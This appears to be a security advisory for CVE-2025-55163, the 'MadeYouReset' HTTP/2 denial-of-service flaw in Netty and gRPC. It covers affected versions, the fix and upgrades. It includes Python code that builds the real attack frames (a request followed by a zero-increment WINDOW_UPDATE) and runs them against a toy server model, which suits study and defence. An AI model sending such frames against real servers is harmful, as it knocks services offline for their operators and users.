CVE-2025-55163
DDoS vulnerability in netty-codec-http2 (Maven)
What is CVE-2025-55163 About?
The MadeYouReset vulnerability is a logical denial-of-service flaw in HTTP/2 handling: an attacker sends malformed control frames that force the server to reset streams it has already started serving, which bypasses the concurrent-stream limit. The result is resource exhaustion and denial of service on affected servers. Exploitation is simple and can be triggered rapidly by an attacker.
Affected Software
- io.netty:netty-codec-http2
  - <4.1.124.Final
  - >4.2.0.Alpha1, <4.2.4.Final
- io.grpc:grpc-netty-shaded
  - <1.75.0
Technical Details
The vulnerability abuses malformed HTTP/2 control frames, or flow-control violations, to make the server reset client-created streams with RST_STREAM frames. Primitives that trigger such a stream error include a WINDOW_UPDATE frame with an invalid increment (0, or one that pushes the flow-control window beyond 2^31-1), a HEADERS or DATA frame on a stream that is already half-closed (remote), and a PRIORITY frame with an incorrect length.

The design flaw lies in how the concurrent-stream limit is accounted. HTTP/2 bounds open streams with SETTINGS_MAX_CONCURRENT_STREAMS, and a stream the server resets because of one of these frames immediately leaves the set of active streams and stops counting toward that limit. The server's backend, however, keeps processing the request that stream carried. By repeatedly sending a request followed by a malformed frame that forces a server-side RST_STREAM for that stream, an attacker accumulates an unbounded number of in-flight backend requests while the stream counter never rises, exhausting CPU and memory. Because the resets are issued by the server rather than sent by the client, defences for Rapid Reset (CVE-2023-44487) that only rate-limit client-sent RST_STREAM frames do not stop this variant.
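The following is an added example, not code from Netty or from this advisory. It models the accounting flaw described above at the frame level: it builds the HEADERS plus WINDOW_UPDATE(increment 0) primitive with the RFC 9113 frame layout, feeds it to a toy server whose "active" set is what SETTINGS_MAX_CONCURRENT_STREAMS counts and whose "backend" set is the work the application layer is still doing, and shows that the active count never grows while backend work does. The server state machine, the `max_server_resets` limit used as a mitigation, and the rule that closing the connection cancels its handlers are simplifying assumptions for illustration; they are not Netty's implementation or its patch.

```python
"""Model of the MadeYouReset accounting flaw at the HTTP/2 frame level.
Frame layout follows RFC 9113; the server state machine and its limits are
simplified assumptions for illustration, not Netty's implementation."""
import struct

FRAME_HEADERS, FRAME_RST_STREAM, FRAME_WINDOW_UPDATE = 0x1, 0x3, 0x8
FLAG_END_STREAM, FLAG_END_HEADERS = 0x1, 0x4
PROTOCOL_ERROR = 0x1


def frame(ftype, flags, stream_id, payload=b""):
    """Encode one frame: 24-bit length, type, flags, 31-bit stream id, payload."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def headers_frame(stream_id, hpack_block=b"\x82\x86\x84"):
    """HEADERS with END_STREAM|END_HEADERS. The constructed default block uses
    HPACK static-table indexes for ':method GET', ':scheme http', ':path /'."""
    return frame(FRAME_HEADERS, FLAG_END_STREAM | FLAG_END_HEADERS,
                 stream_id, hpack_block)


def window_update_frame(stream_id, increment):
    return frame(FRAME_WINDOW_UPDATE, 0, stream_id,
                 struct.pack(">I", increment & 0x7FFFFFFF))


def made_you_reset(stream_id):
    """The attack primitive: a complete request followed by a WINDOW_UPDATE whose
    increment is 0, which RFC 9113 section 6.9 requires the receiver to answer
    with a stream error (RST_STREAM, PROTOCOL_ERROR)."""
    return headers_frame(stream_id) + window_update_frame(stream_id, 0)


def iter_frames(data):
    """Yield (type, flags, stream_id, payload) for each frame in `data`."""
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = struct.unpack(">I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        yield ftype, flags, stream_id, data[off + 9:off + 9 + length]
        off += 9 + length


class Http2Server:
    """Toy server. `active` is what SETTINGS_MAX_CONCURRENT_STREAMS counts;
    `backend` is work the application layer is still doing for a request."""

    def __init__(self, max_concurrent_streams=100, max_server_resets=None):
        self.max_concurrent_streams = max_concurrent_streams
        self.max_server_resets = max_server_resets  # None: vulnerable accounting
        self.active, self.backend = set(), set()
        self.rst_sent = []      # (stream_id, error_code) the server had to send
        self.client_resets = 0  # what Rapid Reset mitigations count
        self.closed = False

    def reset_stream(self, stream_id, code):
        # The stream leaves the concurrent-stream count at once, but nothing
        # cancels the backend work already started for it.
        self.active.discard(stream_id)
        self.rst_sent.append((stream_id, code))
        # Assumed mitigation: bound the resets the server is *forced* to send
        # on one connection, then drop the connection.
        if self.max_server_resets is not None and len(self.rst_sent) > self.max_server_resets:
            self.closed = True
            self.backend.clear()  # assumption: closing the connection cancels its handlers

    def feed(self, data):
        for ftype, flags, stream_id, payload in iter_frames(data):
            if self.closed:
                return
            if ftype == FRAME_HEADERS:
                if len(self.active) >= self.max_concurrent_streams:
                    continue  # limit works for honest clients: stream refused
                self.active.add(stream_id)
                self.backend.add(stream_id)  # request handler starts running
            elif ftype == FRAME_RST_STREAM:
                self.client_resets += 1
            elif ftype == FRAME_WINDOW_UPDATE and stream_id in self.active:
                if struct.unpack(">I", payload)[0] & 0x7FFFFFFF == 0:
                    self.reset_stream(stream_id, PROTOCOL_ERROR)


def run_attack(server, requests):
    """Send `requests` MadeYouReset pairs on successive client stream ids and
    return (streams counted active, requests still burning backend resources,
    connection closed)."""
    for i in range(requests):
        server.feed(made_you_reset(2 * i + 1))
    return len(server.active), len(server.backend), server.closed


if __name__ == "__main__":
    print("vulnerable:", run_attack(Http2Server(100), 1000))
    print("mitigated: ", run_attack(Http2Server(100, max_server_resets=50), 1000))
```

Against the vulnerable server, 1000 request/reset pairs leave zero streams counted as active but 1000 requests still consuming backend resources, and `client_resets` stays at zero, which is why a limiter that only counts client-sent RST_STREAM frames never fires. The mitigated server closes the connection after the 51st forced reset, so backend work is bounded by the reset budget rather than by how fast the attacker can send frames.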
What is the Impact of CVE-2025-55163?
Successful exploitation may allow attackers to cause resource exhaustion, leading to denial of service, CPU overload, and/or memory exhaustion on the target server.
What is the Exploitability of CVE-2025-55163?
Exploiting this vulnerability is of low complexity and requires no authentication or special privileges. It is a remote attack in which the attacker sends crafted HTTP/2 frames directly to the server. The only prerequisites are that the target speaks HTTP/2 and, when a malformed control frame forces it to reset a stream, neither bounds those server-initiated resets nor stops the backend work for the reset stream. Because the concurrent-stream counter never increases, an attacker can quickly generate an unbounded number of "active" backend requests and deplete resources rapidly. Risk is amplified by widespread HTTP/2 adoption and by the subtlety of the protocol flaw, which existing Rapid Reset limits on client-sent RST_STREAM frames do not cover.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known public exploits | | |
What are the Available Fixes for CVE-2025-55163?
About the Fix from Resolved Security
The patch replaces calls to a local stream-reset helper with direct use of the encoder's writeRstStream method, so that RST_STREAM frames sent for unknown or errored HTTP/2 streams go through the same, specification-conformant code path as every other reset. This addresses CVE-2025-55163 by preventing improper stream-state updates when the server is forced to reset such streams, improving protocol compliance and keeping the connection's stream accounting consistent.
Available Upgrade Options
- io.netty:netty-codec-http2
  - <4.1.124.Final → Upgrade to 4.1.124.Final
  - >4.2.0.Alpha1, <4.2.4.Final → Upgrade to 4.2.4.Final
- io.grpc:grpc-netty-shaded
  - <1.75.0 → Upgrade to 1.75.0
Additional Resources
- https://github.com/grpc/grpc-java/commit/6462ef9a11980e168c21d90bbc7245c728fd1a7a
- https://nvd.nist.gov/vuln/detail/CVE-2025-55163
- https://github.com/netty/netty/security/advisories/GHSA-prj3-ccx8-p6x4
- https://osv.dev/vulnerability/GHSA-prj3-ccx8-p6x4
- https://github.com/netty/netty
- https://github.com/netty/netty/commit/be53dc3c9acd9af2e20d0c3c07cd77115a594cf1
What are Similar Vulnerabilities to CVE-2025-55163?
Similar Vulnerabilities: CVE-2023-44487, CVE-2020-13749, CVE-2021-33190, CVE-2020-11110, CVE-2023-38545
